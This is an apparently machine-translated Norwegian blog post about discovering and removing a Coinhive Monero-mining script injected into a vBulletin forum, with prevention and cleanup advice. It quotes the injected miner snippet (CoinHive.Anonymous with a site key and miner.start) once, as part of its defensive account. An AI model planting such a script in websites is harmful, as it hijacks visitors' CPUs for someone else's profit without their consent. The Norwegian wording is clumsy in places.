Slik fjerner du Coinhive krypto-mining script fra nettstedet ditt

Jeg besøker vanligvis forumet hver dag, og jeg hadde ikke sett det dagen før. Så jeg antar at dette hadde skjedd litt om natten, min tid da jeg sov.

Jeg bruker vBulletin-programvare til forumet, og det ble oppdatert til den nyeste versjonen. Dessuten var dette ganske overraskende for oss, da TheWindowsClub.com-domenet bruker Sucuri Web Antivirus og brannmur for å beskytte seg mot Internett-trusler og angrep.

Min PC-sikkerhetsprogramvare stoppet vellykket det skadelige skriptet fra å kjøre på min Windows 10-datamaskin. Jeg sjekket med andre nettlesere som Chrome & Edge, og resultatene var de samme.

Etter å ha høyreklikket på forumets nettside og sjekket kildekoden, fant jeg ut at det var et CryptoMiner skadelig script av CoinHive.

Dette er den skadelige Coinhive Javascript som hadde kommet inn i forumkoden min:

var miner = ny CoinHive.Anonymous ("FG1d35B2h5xqzgJW0bbfyHT22ud9RnEm"); miner.start ();

Uansett var det første jeg gjorde å ta forumet ned og informere Sucuri.

Sucuri-folkene rydde forumet for Coinhive-skriptet som hadde blitt presset inn på forumet mitt om noen timer, og alt var fint.

Hva er CoinHive

Coinhive tilbud en JavaScript-gruvearbeider for Monero Cryptocurrency, som du kan legge inn på nettstedet ditt, og bruke CPUen til nettsøgende datamaskiner til min mynter for deg.

Dette kalles Cryptojacking . Det innebærer hijacking brukerens nettlesere for cryptocurrency mining. Noen nettsideeiere kan bruke det selv til å tjene penger - men i vårt tilfelle ble det injisert.

Når en bruker åpner det infiserte nettstedet, utfører Coinhive JavaScript og minene Monero bruker brukerens CPU-ressurser. Dette kan føre til CPU-gasspjelding og uventet systemkrasj av offerets maskin.

Nå hvis nettleseren din er smittet, ser du ressursutnyttelsen gå opp. Lukk nettleseren, og den vil slippe. Brukeren kan legge merke til at hans maskin oppvarmes, viften går fort, eller batteriet tømmes raskt.

Jeg spurte min kollega Saurabh Mukhekar å besøke forumet mitt ved hjelp av hans Mac og se hva som skjedde. Vel, hans Mac-datamaskin ble også berørt da han åpnet forumet med Safari! Han er en av de smarte Mac OSX-brukere som bruker en antivirusprogramvare for sin Mac. Avast-antivirusprogrammet for Mac stoppet vellykket det skadelige skriptet fra å kjøre.

Saurabur,

CoinHive-malware kapsler ikke bare en Windows-PC, men også Mac-en, da det er nettleserbasert Javascript-infeksjon. Det er bra Jeg tror ikke i myten at Mac ikke trenger en antivirusprogramvare, ellers ville maskinen ha blitt smittet, og min Mac ville fortsatt ha churn out mynter for noen andre.

Forhindre CoinHive fra å infisere nettstedet ditt

1. Ikke bruk noen NULL maler eller plugins på din nettside / forum.
2. Hold CMS oppdatert til den nyeste versjonen.
3. Oppdater webleserprogramvaren jevnlig (PHP, Database, etc …).
4. Sikre nettstedet ditt med websikkerhetsleverandører som Sucuri, Cloudflare, Wordfence, etc.
5. Ta grunnleggende forholdsregler for å sikre bloggen din.

CoinHive minearrangør fjerning fra nettsiden

Først og fremst må du være webansvarlig for infisert nettsted - eller har administrativ legitimasjon som gir deg tilgang til alle websidene.

Når antivirusprogrammet ditt registrerer CoinHive-infeksjonen, høyreklikker du på nettsiden og velger Vis kildekode. Deretter trykker du på Ctrl + F og søker etter "CoinHive".

Når du har identifisert plasseringen til den ondsinnede koden, må du se sin posisjon - hvor ligger den. Nå må du fjerne den manuelt. For å gjøre dette trenger du litt kodende kunnskap om plattformen. Du må finne den infiserte filen / s og manuelt fjerne det ovenfor skriptet fra det. Hvis du ikke er sikker på det, vennligst spør noen ekspert å gjøre det. Siden vi bruker Sucuri, lar vi dem gjøre det.

Når du har gjort det, fjerner du hurtigbufferen til serveren og nettleseren din. Hvis du bruker et cache-plugin eller si MaxCDN, må du også fjerne disse cachene.

Beskytt deg mot kryptogruveskriptene

Cryptocurrencies & Blockchain-teknologien tar over hele verden. Det skaper en innvirkning på verdensøkonomien og forårsaker også teknologiske forstyrrelser. Alle har begynt å fokusere på et slikt lukrativt marked - og dette inkluderer også nettsted hackere. Når avkastningen øker, bør vi forvente at slike teknologier vil bli misbrukt. Det er den mørke siden av ny teknologi.

Det vi kan gjøre er å alltid ta de beste forholdsregler. Bortsett fra å bruke en god sikkerhetsprogramvare, bruk en Chrome- eller Firefox-utvidelse som blokkerer nettsteder fra å bruke CPU til min Cryptocurrency - eller bruk fortsatt Anti-WebMiner som stopper Cryptojacking Mining Script-angrep ved å endre vertsfilen din. Den fungerer på alle nettlesere. Hvis du er en Mac-bruker, må du også ha en antivirusprogramvare for datamaskinen din.

Som et spørsmål om rikelig forholdsregel, hvis du noen gang føler at du har besøkt et infisert nettsted, er det en god ide å slette nettleseren din cache og skann maskinen med antivirusprogramvaren din samt AdwCleaner.

Hold deg trygg, vær oppmerksom!